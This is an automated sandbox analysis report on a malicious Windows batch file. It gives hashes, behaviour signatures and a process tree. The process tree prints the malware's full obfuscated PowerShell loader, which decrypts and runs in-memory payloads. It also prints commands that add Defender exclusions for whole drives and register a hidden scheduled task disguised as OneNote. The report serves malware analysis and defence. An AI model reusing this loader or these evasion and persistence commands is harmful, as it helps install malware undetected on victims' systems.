7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07-03-2024 02:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147.cmd
Size

324KB
MD5

f22cf31da304cb1ccc760108d0b72bb0
SHA1

a5be487217e1148b7410612ff3fb444ea544352b
SHA256

7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147
SHA512

ae0742b55f057279937039533d6a72590bfb5915fd7d0216eaed333bde4d9a6aecbae3da6c0099802c0333f1374dd4b4f18ee6e699caad1ae86180f91dd80ca7
SSDEEP

6144:Ez98sGWUOJA90ycLOVFhYyeOjdR8cFmAbagEwLWhrXuN9vJE:Ez98xWd+yycwFiOpu32aaicN/E

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
64	2852	powershell.exe
68	2852	powershell.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
60	api.ipify.org
64	api.ipify.org
67	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4468	timeout.exe
2992	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
1648	powershell.exe
1648	powershell.exe
4024	powershell.exe
4024	powershell.exe
492	powershell.exe
492	powershell.exe
492	powershell.exe
2272	powershell.exe
2272	powershell.exe
2272	powershell.exe
640	powershell.exe
640	powershell.exe
640	powershell.exe
2852	powershell.exe
2852	powershell.exe
2852	powershell.exe
3068	powershell.exe
3068	powershell.exe
3068	powershell.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe
792	powershell.exe
792	powershell.exe
792	powershell.exe
2852	powershell.exe
2852	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	492	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeIncreaseQuotaPrivilege	2272	powershell.exe
Token: SeSecurityPrivilege	2272	powershell.exe
Token: SeTakeOwnershipPrivilege	2272	powershell.exe
Token: SeLoadDriverPrivilege	2272	powershell.exe
Token: SeSystemProfilePrivilege	2272	powershell.exe
Token: SeSystemtimePrivilege	2272	powershell.exe
Token: SeProfSingleProcessPrivilege	2272	powershell.exe
Token: SeIncBasePriorityPrivilege	2272	powershell.exe
Token: SeCreatePagefilePrivilege	2272	powershell.exe
Token: SeBackupPrivilege	2272	powershell.exe
Token: SeRestorePrivilege	2272	powershell.exe
Token: SeShutdownPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeSystemEnvironmentPrivilege	2272	powershell.exe
Token: SeRemoteShutdownPrivilege	2272	powershell.exe
Token: SeUndockPrivilege	2272	powershell.exe
Token: SeManageVolumePrivilege	2272	powershell.exe
Token: 33	2272	powershell.exe
Token: 34	2272	powershell.exe
Token: 35	2272	powershell.exe
Token: 36	2272	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeIncreaseQuotaPrivilege	640	powershell.exe
Token: SeSecurityPrivilege	640	powershell.exe
Token: SeTakeOwnershipPrivilege	640	powershell.exe
Token: SeLoadDriverPrivilege	640	powershell.exe
Token: SeSystemProfilePrivilege	640	powershell.exe
Token: SeSystemtimePrivilege	640	powershell.exe
Token: SeProfSingleProcessPrivilege	640	powershell.exe
Token: SeIncBasePriorityPrivilege	640	powershell.exe
Token: SeCreatePagefilePrivilege	640	powershell.exe
Token: SeBackupPrivilege	640	powershell.exe
Token: SeRestorePrivilege	640	powershell.exe
Token: SeShutdownPrivilege	640	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeSystemEnvironmentPrivilege	640	powershell.exe
Token: SeRemoteShutdownPrivilege	640	powershell.exe
Token: SeUndockPrivilege	640	powershell.exe
Token: SeManageVolumePrivilege	640	powershell.exe
Token: 33	640	powershell.exe
Token: 34	640	powershell.exe
Token: 35	640	powershell.exe
Token: 36	640	powershell.exe
Token: SeIncreaseQuotaPrivilege	640	powershell.exe
Token: SeSecurityPrivilege	640	powershell.exe
Token: SeTakeOwnershipPrivilege	640	powershell.exe
Token: SeLoadDriverPrivilege	640	powershell.exe
Token: SeSystemProfilePrivilege	640	powershell.exe
Token: SeSystemtimePrivilege	640	powershell.exe
Token: SeProfSingleProcessPrivilege	640	powershell.exe
Token: SeIncBasePriorityPrivilege	640	powershell.exe
Token: SeCreatePagefilePrivilege	640	powershell.exe
Token: SeBackupPrivilege	640	powershell.exe
Token: SeRestorePrivilege	640	powershell.exe
Token: SeShutdownPrivilege	640	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeSystemEnvironmentPrivilege	640	powershell.exe
Token: SeRemoteShutdownPrivilege	640	powershell.exe
Token: SeUndockPrivilege	640	powershell.exe
Token: SeManageVolumePrivilege	640	powershell.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 1184 wrote to memory of 4920	1184	cmd.exe	89
PID 1184 wrote to memory of 4920	1184	cmd.exe	89
PID 4920 wrote to memory of 1944	4920	cmd.exe	91
PID 4920 wrote to memory of 1944	4920	cmd.exe	91
PID 4920 wrote to memory of 1648	4920	cmd.exe	92
PID 4920 wrote to memory of 1648	4920	cmd.exe	92
PID 4920 wrote to memory of 1648	4920	cmd.exe	92
PID 1648 wrote to memory of 4024	1648	powershell.exe	96
PID 1648 wrote to memory of 4024	1648	powershell.exe	96
PID 1648 wrote to memory of 4024	1648	powershell.exe	96
PID 1648 wrote to memory of 492	1648	powershell.exe	101
PID 1648 wrote to memory of 492	1648	powershell.exe	101
PID 1648 wrote to memory of 492	1648	powershell.exe	101
PID 1648 wrote to memory of 2272	1648	powershell.exe	104
PID 1648 wrote to memory of 2272	1648	powershell.exe	104
PID 1648 wrote to memory of 2272	1648	powershell.exe	104
PID 1648 wrote to memory of 640	1648	powershell.exe	108
PID 1648 wrote to memory of 640	1648	powershell.exe	108
PID 1648 wrote to memory of 640	1648	powershell.exe	108
PID 1648 wrote to memory of 860	1648	powershell.exe	111
PID 1648 wrote to memory of 860	1648	powershell.exe	111
PID 1648 wrote to memory of 860	1648	powershell.exe	111
PID 860 wrote to memory of 2400	860	cmd.exe	113
PID 860 wrote to memory of 2400	860	cmd.exe	113
PID 860 wrote to memory of 2400	860	cmd.exe	113
PID 2400 wrote to memory of 3764	2400	cmd.exe	115
PID 2400 wrote to memory of 3764	2400	cmd.exe	115
PID 2400 wrote to memory of 3764	2400	cmd.exe	115
PID 2400 wrote to memory of 2852	2400	cmd.exe	116
PID 2400 wrote to memory of 2852	2400	cmd.exe	116
PID 2400 wrote to memory of 2852	2400	cmd.exe	116
PID 4920 wrote to memory of 4468	4920	cmd.exe	117
PID 4920 wrote to memory of 4468	4920	cmd.exe	117
PID 2852 wrote to memory of 3068	2852	powershell.exe	118
PID 2852 wrote to memory of 3068	2852	powershell.exe	118
PID 2852 wrote to memory of 3068	2852	powershell.exe	118
PID 2852 wrote to memory of 2804	2852	powershell.exe	119
PID 2852 wrote to memory of 2804	2852	powershell.exe	119
PID 2852 wrote to memory of 2804	2852	powershell.exe	119
PID 2852 wrote to memory of 4728	2852	powershell.exe	121
PID 2852 wrote to memory of 4728	2852	powershell.exe	121
PID 2852 wrote to memory of 4728	2852	powershell.exe	121
PID 2852 wrote to memory of 792	2852	powershell.exe	123
PID 2852 wrote to memory of 792	2852	powershell.exe	123
PID 2852 wrote to memory of 792	2852	powershell.exe	123
PID 2852 wrote to memory of 4336	2852	powershell.exe	127
PID 2852 wrote to memory of 4336	2852	powershell.exe	127
PID 2852 wrote to memory of 4336	2852	powershell.exe	127
PID 2400 wrote to memory of 2992	2400	cmd.exe	129
PID 2400 wrote to memory of 2992	2400	cmd.exe	129
PID 2400 wrote to memory of 2992	2400	cmd.exe	129

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147.cmd';$ODkQ='LoaZzmrdZzmr'.Replace('Zzmr', ''),'GetEfRaCuEfRarrEfRaentEfRaPrEfRaocEfRaeEfRassEfRa'.Replace('EfRa', ''),'DePSVhcoPSVhmPSVhpPSVhrPSVhePSVhssPSVh'.Replace('PSVh', ''),'CrqYdMeqYdMaqYdMteqYdMDeqYdMcrqYdMypqYdMtqYdMoqYdMrqYdM'.Replace('qYdM', ''),'EntURWkryURWkPoURWkintURWk'.Replace('URWk', ''),'SSwVRpSwVRliSwVRtSwVR'.Replace('SwVR', ''),'FrucCtomucCtBaucCtse6ucCt4SucCttriucCtngucCt'.Replace('ucCt', ''),'MaToYLinMToYLodToYLuleToYL'.Replace('ToYL', ''),'ComrKvpyTmrKvomrKv'.Replace('mrKv', ''),'EleqaOqmqaOqentqaOqAtqaOq'.Replace('qaOq', ''),'TXUOZrXUOZansXUOZfoXUOZrmXUOZFiXUOZnXUOZaXUOZlXUOZBXUOZlocXUOZkXUOZ'.Replace('XUOZ', ''),'InvfHMzofHMzkefHMz'.Replace('fHMz', ''),'ChayucYngeyucYExyucYteyucYnsiyucYonyucY'.Replace('yucY', ''),'ReyCztadLyCztiyCztnyCztesyCzt'.Replace('yCzt', '');powershell -w hidden;function RNPkq($jThxQ){$NiGFo=[System.Security.Cryptography.Aes]::Create();$NiGFo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NiGFo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NiGFo.Key=[System.Convert]::($ODkQ[6])('I3n9E71fQnoFNjaFkCuv4EPiC6iDCOQJ5raLU5GVxFA=');$NiGFo.IV=[System.Convert]::($ODkQ[6])('+KU6MfrDea61pGgTVctRAA==');$pbojD=$NiGFo.($ODkQ[3])();$dVDxP=$pbojD.($ODkQ[10])($jThxQ,0,$jThxQ.Length);$pbojD.Dispose();$NiGFo.Dispose();$dVDxP;}function SLjtK($jThxQ){$JxKpm=New-Object System.IO.MemoryStream(,$jThxQ);$WhLDl=New-Object System.IO.MemoryStream;$zgeuK=New-Object System.IO.Compression.GZipStream($JxKpm,[IO.Compression.CompressionMode]::($ODkQ[2]));$zgeuK.($ODkQ[8])($WhLDl);$zgeuK.Dispose();$JxKpm.Dispose();$WhLDl.Dispose();$WhLDl.ToArray();}$yiRcd=[System.IO.File]::($ODkQ[13])([Console]::Title);$OZnlH=SLjtK (RNPkq ([Convert]::($ODkQ[6])([System.Linq.Enumerable]::($ODkQ[9])($yiRcd, 5).Substring(2))));$HSoYW=SLjtK (RNPkq ([Convert]::($ODkQ[6])([System.Linq.Enumerable]::($ODkQ[9])($yiRcd, 6).Substring(2))));[System.Reflection.Assembly]::($ODkQ[0])([byte[]]$HSoYW).($ODkQ[4]).($ODkQ[11])($null,$null);[System.Reflection.Assembly]::($ODkQ[0])([byte[]]$OZnlH).($ODkQ[4]).($ODkQ[11])($null,$null); "
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4024
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:492
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2272
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73784' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73784Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:640
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network73784Man.cmd"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:860
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network73784Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2400
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network73784Man.cmd';$ODkQ='LoaZzmrdZzmr'.Replace('Zzmr', ''),'GetEfRaCuEfRarrEfRaentEfRaPrEfRaocEfRaeEfRassEfRa'.Replace('EfRa', ''),'DePSVhcoPSVhmPSVhpPSVhrPSVhePSVhssPSVh'.Replace('PSVh', ''),'CrqYdMeqYdMaqYdMteqYdMDeqYdMcrqYdMypqYdMtqYdMoqYdMrqYdM'.Replace('qYdM', ''),'EntURWkryURWkPoURWkintURWk'.Replace('URWk', ''),'SSwVRpSwVRliSwVRtSwVR'.Replace('SwVR', ''),'FrucCtomucCtBaucCtse6ucCt4SucCttriucCtngucCt'.Replace('ucCt', ''),'MaToYLinMToYLodToYLuleToYL'.Replace('ToYL', ''),'ComrKvpyTmrKvomrKv'.Replace('mrKv', ''),'EleqaOqmqaOqentqaOqAtqaOq'.Replace('qaOq', ''),'TXUOZrXUOZansXUOZfoXUOZrmXUOZFiXUOZnXUOZaXUOZlXUOZBXUOZlocXUOZkXUOZ'.Replace('XUOZ', ''),'InvfHMzofHMzkefHMz'.Replace('fHMz', ''),'ChayucYngeyucYExyucYteyucYnsiyucYonyucY'.Replace('yucY', ''),'ReyCztadLyCztiyCztnyCztesyCzt'.Replace('yCzt', '');powershell -w hidden;function RNPkq($jThxQ){$NiGFo=[System.Security.Cryptography.Aes]::Create();$NiGFo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NiGFo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NiGFo.Key=[System.Convert]::($ODkQ[6])('I3n9E71fQnoFNjaFkCuv4EPiC6iDCOQJ5raLU5GVxFA=');$NiGFo.IV=[System.Convert]::($ODkQ[6])('+KU6MfrDea61pGgTVctRAA==');$pbojD=$NiGFo.($ODkQ[3])();$dVDxP=$pbojD.($ODkQ[10])($jThxQ,0,$jThxQ.Length);$pbojD.Dispose();$NiGFo.Dispose();$dVDxP;}function SLjtK($jThxQ){$JxKpm=New-Object System.IO.MemoryStream(,$jThxQ);$WhLDl=New-Object System.IO.MemoryStream;$zgeuK=New-Object System.IO.Compression.GZipStream($JxKpm,[IO.Compression.CompressionMode]::($ODkQ[2]));$zgeuK.($ODkQ[8])($WhLDl);$zgeuK.Dispose();$JxKpm.Dispose();$WhLDl.Dispose();$WhLDl.ToArray();}$yiRcd=[System.IO.File]::($ODkQ[13])([Console]::Title);$OZnlH=SLjtK (RNPkq ([Convert]::($ODkQ[6])([System.Linq.Enumerable]::($ODkQ[9])($yiRcd, 5).Substring(2))));$HSoYW=SLjtK (RNPkq ([Convert]::($ODkQ[6])([System.Linq.Enumerable]::($ODkQ[9])($yiRcd, 6).Substring(2))));[System.Reflection.Assembly]::($ODkQ[0])([byte[]]$HSoYW).($ODkQ[4]).($ODkQ[11])($null,$null);[System.Reflection.Assembly]::($ODkQ[0])([byte[]]$OZnlH).($ODkQ[4]).($ODkQ[11])($null,$null); "
        6⤵
        
        PID:3764
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        6⤵
        Blocklisted process makes network request
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network73784Man')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73784' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73784Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:792
        
        C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2852" "3540" "3520" "3544" "0" "0" "3548" "0" "0" "0" "0" "0"
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4336
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /nobreak /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2992
- - C:\Windows\system32\timeout.exe
    timeout /nobreak /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
938ffc2cba917b243d86b2cf76dcefb4

SHA1
234b53d91d075f16cc63c731eefdae278e2faad3

SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
21KB

MD5
1fb8149023b6e7ff03d3d732606d145a

SHA1
45b77c08e3da08127a943be185b8cdccf2ce57a8

SHA256
6542ca9feb4becc91e1f4fc797c147e711e6ddbc33a0ac8e146445b34a094795

SHA512
2002989712b1971ca991a7d57f9ef6d91d6046d7f589f9bcd971348c1c251678feec2daf9e66ec6e984909202d86671e38ce17ba1504c8f172862d665c632a1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
592B

MD5
5d349fd58f7351d47c31025b2e65c294

SHA1
b15c5751213e52f047e3053457a6838b5aaf2278

SHA256
0e25b0943b58fd71f997a1543246509525b832314344e887130ce3bd1b72c04d

SHA512
f8a9d16bc684ab5f94494ae8c839be9d96bc1c7ed57af035fb7bca4668def27b55e12888ea61ddeeef38238dcee3c045b06c00e6ad4e5311980ba33db6ff4dae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
440e61b6628137821391e754ca9f38c6

SHA1
1f0ccc7cc3f6e3f267c43623fa40a198a97342c1

SHA256
bbd2f65c10ba2ae30416a31d085deed4bb6deff238ca3c31a408af63527a0f05

SHA512
cb0c75c66b895c340dc1b2f996789194eb59c98eb356d95c5da02aac0e306deccb00a2d69d981e21799eb679b978799da901ec04871ad3bd9a1bba6479977f7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
bb237548adb2ce87327e937a6153a64c

SHA1
400f6b3073293b44c9edf3d63e5e10b422910bc1

SHA256
30fd77893a5e456844b6d6395849671f76e27149beb35a7d210270a803c92a8f

SHA512
2762f55788eef644c288e0dd9202207f21a696731525bf4cc1a90b3fafb1b028f603f2dac4a3c0cfd9698ace8679883fe757d438687473e5d55585fe46d769c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
046f8735df2efbed64083d8d5555bf42

SHA1
bb090279ab52a918e809b4a800813edb14ac5cc0

SHA256
80faa3367337d9f3f517d9d12b81deafb992b313cd4df7b20ca3fbc9ee60a71b

SHA512
df0b5f77737dc23560c318e578b5e736261ab3c178327616269e7a6f6732ed716de4574bcf08e646aa205d4f18ea0d92fdab93419b63fe0b9742df648ab47c86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
f3ab0e1624baa0f2911808a2f8babe3a

SHA1
d759c54f695cfd4d1dc269cd37f50aaa58904d9b

SHA256
178d0811244b740dcbce5103f3dab9085522e4279516eae5422133865663f829

SHA512
862939f142a816283e3f37d69ff64260edd78fbc9f24e53bd8ba67428aedcefb2451ca1596e7f96cb1da5c17bac2799ee62e79098f54d929e426295b24f32be4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f2507e8b7cb5549e03baca8bc6f46b46

SHA1
9a865bf5bf11b52ddffac2bedf6b1b0cb7284fd9

SHA256
a1f5e2fc0ab75ad6bad5cde0dc7f29ecd83a0227dd6d9f976f6f5ce2167fcc92

SHA512
20ec4b6008f27f0bd4d699e1ae51f6b1989ad839fb139cd5bc0cbba9662722cbb53e807a638ac703e96bbc030d2047fe3cb628dc390eaeaed7b049346691c9e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cdpefaf.il2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Network73784Man.cmd

Filesize
324KB

MD5
f22cf31da304cb1ccc760108d0b72bb0

SHA1
a5be487217e1148b7410612ff3fb444ea544352b

SHA256
7694004002d60ed34bc6785f298e7ec3079464d491f0f2f0862bae1988a5e147

SHA512
ae0742b55f057279937039533d6a72590bfb5915fd7d0216eaed333bde4d9a6aecbae3da6c0099802c0333f1374dd4b4f18ee6e699caad1ae86180f91dd80ca7

Download Submit
memory/492-71-0x0000000007480000-0x000000000749A000-memory.dmp

Filesize
104KB

Download
memory/492-74-0x0000000074F20000-0x00000000756D0000-memory.dmp

Filesize
7.7MB

Download
memory/492-63-0x0000000006FF0000-0x000000000700E000-memory.dmp

Filesize
120KB

Download
memory/492-70-0x0000000007380000-0x0000000007394000-memory.dmp

Filesize
80KB

Download
memory/492-69-0x0000000007370000-0x000000000737E000-memory.dmp

Filesize
56KB

Download
memory/492-68-0x0000000007340000-0x0000000007351000-memory.dmp

Filesize
68KB

Download
memory/492-67-0x00000000073C0000-0x0000000007456000-memory.dmp

Filesize
600KB

Download
memory/492-66-0x00000000071B0000-0x00000000071BA000-memory.dmp

Filesize
40KB

Download
memory/492-62-0x0000000004B40000-0x0000000004B50000-memory.dmp

Filesize
64KB

Download
memory/492-72-0x0000000007460000-0x0000000007468000-memory.dmp

Filesize
32KB

Download
memory/492-39-0x0000000074F20000-0x00000000756D0000-memory.dmp

Filesize
7.7MB

Download
memory/492-40-0x0000000004B40000-0x0000000004B50000-memory.dmp

Filesize
64KB

Download
memory/492-50-0x000000007F460000-0x000000007F470000-memory.dmp

Filesize
64KB

Download
memory/492-51-0x0000000006FB0000-0x0000000006FE2000-memory.dmp

Filesize
200KB

Download
memory/492-52-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

Filesize
304KB

Download
memory/492-65-0x0000000007010000-0x00000000070B3000-memory.dmp

Filesize
652KB

Download
memory/492-64-0x0000000004B40000-0x0000000004B50000-memory.dmp

Filesize
64KB

Download
memory/640-119-0x000000007F630000-0x000000007F640000-memory.dmp

Filesize
64KB

Download
memory/640-120-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

Filesize
304KB

Download
memory/640-108-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/640-106-0x0000000074F20000-0x00000000756D0000-memory.dmp

Filesize
7.7MB

Download
memory/640-130-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/640-131-0x0000000004D30000-0x0000000004D40000-memory.dmp

Filesize
64KB

Download
memory/640-133-0x0000000074F20000-0x00000000756D0000-memory.dmp

Filesize
7.7MB

Download
memory/1648-78-0x0000000074F20000-0x00000000756D0000-memory.dmp

Filesize
7.7MB

Download
memory/1648-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

Filesize
408KB

Download
memory/1648-18-0x0000000005FC0000-0x000000000600C000-memory.dmp

Filesize
304KB

Download
memory/1648-4-0x0000000005100000-0x0000000005122000-memory.dmp

Filesize
136KB

Download
memory/1648-151-0x0000000074F20000-0x00000000756D0000-memory.dmp

Filesize
7.7MB

Download
memory/1648-37-0x00000000074B0000-0x00000000074F2000-memory.dmp

Filesize
264KB

Download
memory/1648-20-0x0000000007270000-0x00000000072E6000-memory.dmp

Filesize
472KB

Download
memory/1648-17-0x0000000005F70000-0x0000000005F8E000-memory.dmp

Filesize
120KB

Download
memory/1648-5-0x0000000005900000-0x0000000005966000-memory.dmp

Filesize
408KB

Download
memory/1648-19-0x0000000006530000-0x0000000006574000-memory.dmp

Filesize
272KB

Download
memory/1648-21-0x0000000007970000-0x0000000007FEA000-memory.dmp

Filesize
6.5MB

Download
memory/1648-22-0x0000000007310000-0x000000000732A000-memory.dmp

Filesize
104KB

Download
memory/1648-102-0x0000000002830000-0x0000000002840000-memory.dmp

Filesize
64KB

Download
memory/1648-3-0x0000000005260000-0x0000000005888000-memory.dmp

Filesize
6.2MB

Download
memory/1648-2-0x0000000002830000-0x0000000002840000-memory.dmp

Filesize
64KB

Download
memory/1648-0-0x00000000026F0000-0x0000000002726000-memory.dmp

Filesize
216KB

Download
memory/1648-107-0x0000000002830000-0x0000000002840000-memory.dmp

Filesize
64KB

Download
memory/1648-1-0x0000000074F20000-0x00000000756D0000-memory.dmp

Filesize
